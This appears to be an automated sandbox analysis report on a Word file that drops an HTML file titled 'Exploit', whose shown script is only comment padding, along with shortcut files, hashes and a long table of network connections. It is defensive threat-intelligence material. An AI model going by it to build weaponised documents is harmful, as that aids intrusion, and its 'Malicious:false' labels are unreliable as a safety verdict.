                                                                                                                                                                                                                                        SHA-512:81BD09BE364EDD5F723D2E62B7FB8E2EEA98435EF3E5F3E528263284365D84425F8DA8979C6018494691C8AE794BC74A9A50BCA31D0B07AC17C81A704CF56751
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBDVDVDV..//BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 12:41:30 2022, mtime=Thu Aug 18 00:57:10 2022, atime=Thu Aug 18 00:56:59 2022, length=10190, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1060
                                                                                                                                                                                                                                        Entropy (8bit):4.661675465135594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:8uBrKvHA7VqwNKUAJb8Z8IDZeaek7aB6m:88rKvHIqwNGJG8lVhB6
                                                                                                                                                                                                                                        MD5:60F4C253F2937CB95997E687E20A9B19
                                                                                                                                                                                                                                        SHA1:3562500F44848CC3EFA361BB32717EA5BF546F26
                                                                                                                                                                                                                                        SHA-256:0FEC411E4A05A1B9528DCA2825E41545E57A4C057BF5D79380F3A97D0055518C
                                                                                                                                                                                                                                        SHA-512:62CCC781BA036CB0A986DE4085B33FAAEAB72994A7D4760A787B0DFC11E783875B61E71E49F21AED0C19B79D0645CA1C2C33A822145C1FCA3CFFCC3C74D8B8F3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:L..................F.... .....L.u.....5....8.o.....'...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......U1m..user.<.......N...U......#J....................2ax.j.o.n.e.s.....~.1......U2m..Desktop.h.......N...U.......Y..............>......`.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2..'...U . .DL18AY~1.DOC..P.......U0m.U .....P......................7d.d.l.1.8.a.Y.T.B.o.5...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\dl18aYTBo5.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.l.1.8.a.Y.T.B.o.5...d.o.c.x.........:..,.LB.)...As...`.......X.......855271...........!a..%.H.VZAj.....r.h............!a..%.H.VZAj.....r.h.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                        Entropy (8bit):4.721620404569601
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:bDuMJlZ0nLLUmxWK0nLLUv:bCS0L+LC
                                                                                                                                                                                                                                        MD5:78743467AD7B7A7C4AEA7B26F05F0159
                                                                                                                                                                                                                                        SHA1:1EE278AFB6EAE05D6BAD394AC28A4AC85E36A994
                                                                                                                                                                                                                                        SHA-256:ABD0F630011CFCF4BA855FFF7AF8C5644D09A8F1A424F1EC8D3C0186ECCB6582
                                                                                                                                                                                                                                        SHA-512:DBCB93CE9E7236A91C1BCDF35F7840ABE97FDD5B915E1698A703058F108986C7AC64C7E5276B5D237429F9B146A475BBC9C91C1442BEC56C80A0674AFA7EF448
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:[folders]..Templates.LNK=0..dl18aYTBo5.LNK=0..[misc]..dl18aYTBo5.LNK=0..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                                                                                        Entropy (8bit):2.358092282332054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Rl/ZddSBdl/tlpWQUnlqSpUWdQ6ltllltr:RtZfSr7WBooPvB
                                                                                                                                                                                                                                        MD5:375CCA4DBD946D609D4615D1F34044E2
                                                                                                                                                                                                                                        SHA1:D5FE02B6D69BE028B1DE29CABE684B7BB1AA83EC
                                                                                                                                                                                                                                        SHA-256:D8491E148D3AB089497B0709FE2B1C4DB166CDFAEE6E3D1D07006B75D04CE087
                                                                                                                                                                                                                                        SHA-512:FB6BC1DBA2F9DE09395A1BA7AAB33C067F3C1ABE49677152C3008C18E0B81D8798D22E85471CA1AF85BDF1010D88442E59EA50FFE3D9C020A59B3AAE0003D249
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.pratesh................................................p.r.a.t.e.s.h..........s..F............................s..1...........T.......6C..8.6..s..................
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20
                                                                                                                                                                                                                                        Entropy (8bit):2.8954618442383215
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                                                                                                                        MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                                                                                                                        SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                                                                                                                        SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                                                                                                                        SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..p.r.a.t.e.s.h.....
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                                                                                        Entropy (8bit):2.358092282332054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Rl/ZddSBdl/tlpWQUnlqSpUWdQ6ltllltr:RtZfSr7WBooPvB
                                                                                                                                                                                                                                        MD5:375CCA4DBD946D609D4615D1F34044E2
                                                                                                                                                                                                                                        SHA1:D5FE02B6D69BE028B1DE29CABE684B7BB1AA83EC
                                                                                                                                                                                                                                        SHA-256:D8491E148D3AB089497B0709FE2B1C4DB166CDFAEE6E3D1D07006B75D04CE087
                                                                                                                                                                                                                                        SHA-512:FB6BC1DBA2F9DE09395A1BA7AAB33C067F3C1ABE49677152C3008C18E0B81D8798D22E85471CA1AF85BDF1010D88442E59EA50FFE3D9C020A59B3AAE0003D249
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.pratesh................................................p.r.a.t.e.s.h..........s..F............................s..1...........T.......6C..8.6..s..................
                                                                                                                                                                                                                                        File type:Microsoft OOXML
                                                                                                                                                                                                                                        Entropy (8bit):7.869840361272895
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                                                                                        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                                                                                        • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                                                                                        File name:dl18aYTBo5.docx
                                                                                                                                                                                                                                        File size:10190
                                                                                                                                                                                                                                        MD5:b91615355a11f5bb8b7c381a8bc4485a
                                                                                                                                                                                                                                        SHA1:7950b1730e05a2dcdd19f1a98a697798a9edbf77
                                                                                                                                                                                                                                        SHA256:3fdd30eb0961c98259d58327745ec253588b1553d9822d613d45d076c4b07ec1
                                                                                                                                                                                                                                        SHA512:c8fbe110484db356ff4f67bcad94930b26fab9040a560a5a0d466d5766b2430b64585132048f787f0c7766b12e33ab765d415bd08a5fb7482a12d1da9160a00a
                                                                                                                                                                                                                                        SSDEEP:192:E5VR2DuRkZx41Jlb8VPkf+CFk4v1Y2VveFLC9Fi/CRQIZleDM:EHkZx0lD9+2Vv6aRdleDM
                                                                                                                                                                                                                                        TLSH:73229D3BEAA50DB4C6E69275E0AC1A25C35C06B7F33DF94A349423D812C85DD5BE530C
                                                                                                                                                                                                                                        File Content Preview:PK.........C.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p
                                                                                                                                                                                                                                        Icon Hash:74fcd0d2d6d6d0cc
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.526428938 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.526494026 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.526593924 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.526906967 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.526932955 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.573925018 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.574052095 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.577141047 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.577157974 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.577445030 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.579032898 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.603962898 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604150057 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604202032 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604235888 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604248047 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604283094 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604307890 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604378939 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604424953 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604434967 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604449987 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604504108 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604840040 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604918957 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604983091 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.604996920 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.605057001 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.605220079 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.605230093 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.605627060 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.605735064 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.606307030 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.606355906 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.606370926 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.606384993 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.606451035 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.606506109 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.606517076 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.607175112 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.607285976 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.607351065 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.607368946 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.607424974 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.607436895 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608016968 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608083010 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608097076 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608172894 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608227015 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608237982 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608653069 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608716965 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608731985 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608810902 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608866930 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608879089 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.608949900 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.609002113 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.609014988 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.609500885 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.609566927 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.609579086 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619195938 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619288921 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619314909 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619474888 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619538069 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619549990 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619615078 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619692087 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619694948 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619714975 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619767904 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619786978 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619930029 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619982958 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.619997025 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620279074 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620335102 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620351076 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620439053 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620496035 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620510101 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.620980978 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621049881 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621067047 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621174097 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621242046 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621253967 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621484995 CEST44349704185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.621555090 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.630376101 CEST49704443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674331903 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674370050 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674452066 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674659967 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.674670935 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.709250927 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.725590944 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.726998091 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.727076054 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.863574028 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.863698006 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.863776922 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872134924 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872164965 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872226954 CEST49705443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:05.872239113 CEST44349705185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.909831047 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.909883976 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.910011053 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.910334110 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.910356045 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.943308115 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.943865061 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.945125103 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.945167065 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982552052 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982861042 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982942104 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.982981920 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983009100 CEST44349706185.199.108.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983023882 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983056068 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:08.983109951 CEST49706443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.067408085 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.067440033 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.067512989 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.068056107 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.068075895 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.104702950 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.104819059 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.104931116 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.116708040 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.117278099 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.117353916 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.117887020 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.159363985 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290308952 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290421963 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290438890 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290498972 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290505886 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290529966 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290565968 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290616035 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290623903 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290676117 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290687084 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290705919 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290743113 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290779114 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290783882 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290810108 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290844917 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.290877104 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.297817945 CEST49707443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.297841072 CEST44349707185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.482681990 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.482744932 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.482848883 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.483077049 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.483098030 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.517188072 CEST44349708185.199.109.133192.168.2.4
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.517290115 CEST49708443192.168.2.4185.199.109.133
                                                                                                                                                                                                                                        Aug 18, 2022 03:57:09.517765045 CEST49708443192.168.2.4185.199.109.133
